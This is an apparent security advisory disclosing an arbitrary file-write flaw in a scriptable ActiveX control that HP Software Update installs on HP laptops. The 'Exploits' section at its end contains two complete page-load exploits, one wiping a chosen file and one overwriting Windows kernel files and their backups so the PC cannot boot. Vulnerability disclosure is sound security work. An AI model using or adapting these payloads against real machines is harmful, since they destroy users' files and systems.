<<< Date Index >>>     <<< Thread Index >>>

HP laptops Software Update tool vulnerability



Advisory:
/////////

There is another remotely exploitable flaw within software preinstalled in HP 
notebook machines. This time, the culprit is automatic software update tool 
provided by the vendor.The Potential exploitation may lead to user files loss 
or altering vital system files (e.g. kernel), thus leaving PC unbootable.



Overview:
/////////

The flaw is located in the software called HP Software Update shipped with the 
HP notebooks to support automatic software updates and critical vulnerability 
patching. One of the ActiveX controls deployed by default by the vendor 
contains an insecure method giving a potential attacker the remote system 
arbitrary file write access.



Impact:
///////

Remote user files contents corruption
Remote system kernel files damage / Operating System DoS condition




Attack vectors:
///////////////

There are two main attack vector schemes:

- inducing remote user to launch WWW link after obtaining the information about 
the location of an arbitrary file(s) locations/names in the remote system. 
After clicking the link the files contents will be unrecoverably destroyed. 
This attack vector thus requires additional social engineering of the vitim to 
acquire exact name and location of the potential attack target files.
  
- inducing remote user to launch WWW link resulting in corruption of vital 
Operating System files, leaving the system unusable. This attack vector DOESN'T 
require any additional victim social engineering,
 because the system files are always placed in the predictable locations.






Technical details:
//////////////////

The vulnerable ActiveX control EngineRules.dll is a component of HP Software 
Updates system designed by the vendor.

It has assigned CLSID: 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default 
included to "Safe for Scripting" OLE components, that allows full execution 
scripting access to the control methods from within the browser.                
      

The default control installation path is 
C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll

The control is used by the the HP Software Updates software's HPWUCli.exe 
client application to enumerate, load and store available software patches 
information. The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\

The control may also be used by a remote WWW service, such as Hewlett-Packard 
online software update service.

The potentialy insecure method is: 
void SaveToFile(String dataFilePath);

This method is used to store the software patch specific data (version, remote 
location, vendor name, software description) in the binary file beginning with 
the 32bit integer value containing the actual patches count stored in the data 
file.

The problem lies in the lack of distinguish between local and global data file 
area in this control. Both LoadDataFromFile() method and SaveDataToFile() 
method have an access to the entire file system data area, therefore any 
arbitrary user file can be accessed remotely using one of these methods by a 
remote entity.
Use the SaveDataToFile() can be exploited to store the empty-by-initialize 
software patch data in the existing file, which will result in previous file 
contents loss and resetting it to 4 zero-bytes, describing a zero-size patch.

Noticing a specific vulnerability location (vendor's software update system), 
simple disabling of the vulnerable control by the vendor's patch (like in the 
other HP software vulnerbility case - HPInfo) would result in the machine 
software update system compromise in this case and would leave the user 
vulnerable to the future security issues.

Therefore reimplemetation of the update system and/or vulnerable control local 
data area implementation is strongly recommended.





Remote Kernel Wreckage Exploit
//////////////////////////////

Using this flaw one can construct an armed exploit, able for example to destroy 
remote system kernel files and make the remote machine UNBOOTABLE. The exploit 
is using vulnerable SaveToFile() to overwrite the NT System kernel files with 
the 4 zero bytes. The target are memory mapped ntoskrnl.exe and ntkrnlpa.exe 
kernel files which don't have a write lock set on them and may be opened for 
write. Although Windows NT system contains a protection for this kind of 
activity (system files overwrite) it can be fooled by overwriting 
simultanously: system binary files backup directory (\System32\DllCache\) 
actual system kernel files (\System32\) and the Driver Backup directory 
(\Windows\Driver Cache\)
kernel files.

After the execution it will store an zero-initialized patch information using 
SaveToFile() method sequentially to ntoskrnl.exe, ntkrnlpa.exe, ntkrnlmp.exe 
,ntkrpamp.exe NT kernel files , first in the System32\DllCache\ directory, 
second to \System32\ directory and finally to Windows\Driver Cache\ dir. After 
the very next OS shutdown, machine will not be bootable anymore.

The exploit code has been attached to the end of this advisory. NOTE however 
that it is provided ONLY as a Proof of Concept code and has been released ONLY 
to estimate the impact level of the issue.





Vulnerable Software:
////////////////////

HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0

Internet Explorer 6.0  
Internet Explorer 7.0  
 

Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista





Vulnerable Hardware
///////////////////

Every HP notebook machine containing the HP Software Updates application is 
vulnerable. It is possible that the vulnerable machine model list disclosed by 
the vendor as a confirmation to the previous issue concerning HP laptops - "HP 
Info Center" case, will be similar in this case.






Exploits:
/////////


//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////

<html>
<head>
<script language="JavaScript">


var filePath="c:\\temp\\testfile.txt";

function spawn3()
{
        o2obj.SaveToFile(filePath);
}

</script>
</head>

<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>









////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//        
//  WARNING! THE REAL THING...
//  DON'T TRY THIS AT HOME!
//  THIS WILL DAMAGE YOUR 
//  HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////



<html>
<head>
<script language="JavaScript">

function spawn3()
{

        o2obj.EvaluateRules();

        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}


function meltdown()
{
        spawn3();
        spawn3();
        spawn3();
}

</script>
</head>

<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D"
</object>
</body>
</html>







Related final word:
///////////////////

Spiderpig, spiderpig, does whatever the spiderpig does...
;-)







Links:
//////

Original advisory link:
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt





Credits:
////////

Issue discovery and research: porkythepig
Contact: porkythepig@xxxxxxxx